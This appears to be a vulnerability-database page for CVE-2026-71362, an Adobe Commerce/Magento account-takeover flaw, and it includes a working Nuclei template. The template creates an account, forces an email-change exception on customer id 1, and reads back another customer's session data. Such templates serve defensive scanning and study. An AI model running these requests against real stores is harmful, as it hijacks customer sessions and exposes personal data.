Lucene search
+L

Adobe Commerce/Magento - Customer Session Identity Switch

🗓️ 19 Aug 2026 04:15:32Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 4 Views

Improper access control in Magento enables unauthenticated privilege escalation to sensitive resources.

Related
Refs
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2026-71362
11 Aug 202618:31
circl
cve
CVE
CVE-2026-71362
11 Aug 202617:52
cve
cvelist
Cvelist
CVE-2026-71362 Adobe Commerce | Incorrect Authorization (CWE-863)
11 Aug 202617:52
cvelist
githubexploit
GithubExploit
Exploit for CVE-2026-71362
15 Aug 202614:21
githubexploit
euvd
EUVD
EUVD-2026-56844
11 Aug 202617:52
euvd
ncsc
NCSC
Vulnerabilities in Adobe Commerce
12 Aug 202608:17
ncsc
nvd
NVD
CVE-2026-71362
11 Aug 202618:18
nvd
ptsecurity
Positive Technologies
PT-2026-70824
11 Aug 202600:00
ptsecurity
thn
The Hacker News
Adobe Patches Three CVSS 10.0 ColdFusion and Campaign Classic Flaws
12 Aug 202611:13
thn
vulnrichment
Vulnrichment
CVE-2026-71362 Adobe Commerce | Incorrect Authorization (CWE-863)
11 Aug 202617:52
vulnrichment
id: CVE-2026-71362

info:
  name: Adobe Commerce/Magento - Customer Session Identity Switch
  author: 0x_Akoko,dinosn
  severity: critical
  description: |
    Adobe Commerce contains an incorrect authorization vulnerability caused by improper access control, letting attackers escalate privileges to access sensitive resources, exploit requires no user interaction.
  impact: |
    Attackers can gain elevated access to sensitive resources, potentially compromising system integrity and data confidentiality.
  remediation: |
    Update to the latest version of Adobe Commerce.
  reference:
    - https://helpx.adobe.com/security/products/magento/apsb26-92.html
    - https://nvd.nist.gov/vuln/detail/CVE-2026-71362
    - https://sansec.io/research/adobe-commerce-account-takeover-apsb26-92
    - https://github.com/dinosn/cve-2026-71362-magento-lab
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2026-71362
    epss-score: 0.00478
    epss-percentile: 0.39188
    cwe-id: CWE-863
  metadata:
    max-request: 6
    verified: true
    vendor: adobe
    product: magento
    shodan-query: http.component:"Magento"
    fofa-query: app="Magento"
  tags: cve,cve2026,magento,adobe-commerce,ato,account-takeover,intrusive

variables:
  rnd: "{{rand_int(100000, 999999)}}"
  email: "poctest{{rnd}}@poctest.invalid"
  password: "PoCPwd#{{rnd}}"

flow: http(1) && http(2) && http(3) && http(4) && http(5) && http(6)

http:
  - raw:
      - |
        GET /customer/account/create HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(tolower(body), "form_key")'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: fk
        group: 1
        regex:
          - 'name="form_key"[^>]*value="([^"]+)"'
        internal: true

      - type: regex
        name: sessid
        part: header
        group: 1
        regex:
          - '(?i)Set-Cookie:\s*(PHPSESSID=[^;]+)'
        internal: true

  - raw:
      - |
        POST /customer/account/createPost HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: {{sessid}}
        Referer: {{BaseURL}}/customer/account/create

        form_key={{fk}}&firstname=PoCTestCVE&lastname=Detector&email={{email}}&password={{password}}&password_confirmation={{password}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200 || status_code == 302'
        internal: true

    extractors:
      - type: regex
        name: sessid
        part: header
        group: 1
        regex:
          - '(?i)Set-Cookie:\s*(PHPSESSID=[^;]+)'
        internal: true

  - raw:
      - |
        GET /customer/account/edit HTTP/1.1
        Host: {{Hostname}}
        Cookie: {{sessid}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "PoCTestCVE")'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: fk
        group: 1
        regex:
          - 'name="form_key"[^>]*value="([^"]+)"'
        internal: true

      - type: regex
        name: sessid
        part: header
        group: 1
        regex:
          - '(?i)Set-Cookie:\s*(PHPSESSID=[^;]+)'
        internal: true

  - raw:
      - |
        POST /customer/account/editPost HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: {{sessid}}
        Referer: {{BaseURL}}/customer/account/edit

        form_key={{fk}}&id=1&change_email=1&current_password=wrong-password-forces-exception&email={{email}}&firstname=PoCTestCVE&lastname=Detector

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200 || status_code == 302'
        internal: true

    extractors:
      - type: regex
        name: sessid
        part: header
        group: 1
        regex:
          - '(?i)Set-Cookie:\s*(PHPSESSID=[^;]+)'
        internal: true

  - raw:
      - |
        GET /customer/account/edit HTTP/1.1
        Host: {{Hostname}}
        Cookie: {{sessid}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
        internal: true

    extractors:
      - type: regex
        name: sessid
        part: header
        group: 1
        regex:
          - '(?i)Set-Cookie:\s*(PHPSESSID=[^;]+)'
        internal: true

  - raw:
      - |
        GET /customer/section/load?sections=customer&force_new_section_timestamp=true HTTP/1.1
        Host: {{Hostname}}
        Cookie: {{sessid}}
        X-Requested-With: XMLHttpRequest

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - '!contains(body, "PoCTestCVE")'
          - 'regex("\"firstname\":\"[A-Za-z0-9]", body)'
        condition: and

    extractors:
      - type: regex
        name: victim_firstname
        group: 1
        regex:
          - '"firstname":"([^"]+)"'
# digest: 490a00463044022029262b6ac49cb8308b0346e75d98a39d9f877084d720fcff5bcec2c23cc7d72702204bc60a6a8a587b578fbf591be9fe4621d6c7c87d31defa910572e5ca14017549:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

18 Aug 2026 00:35Current
5.7Medium risk
Vulners AI Score5.7
CVSS 3.19.1
EPSS0.01301
SSVC
4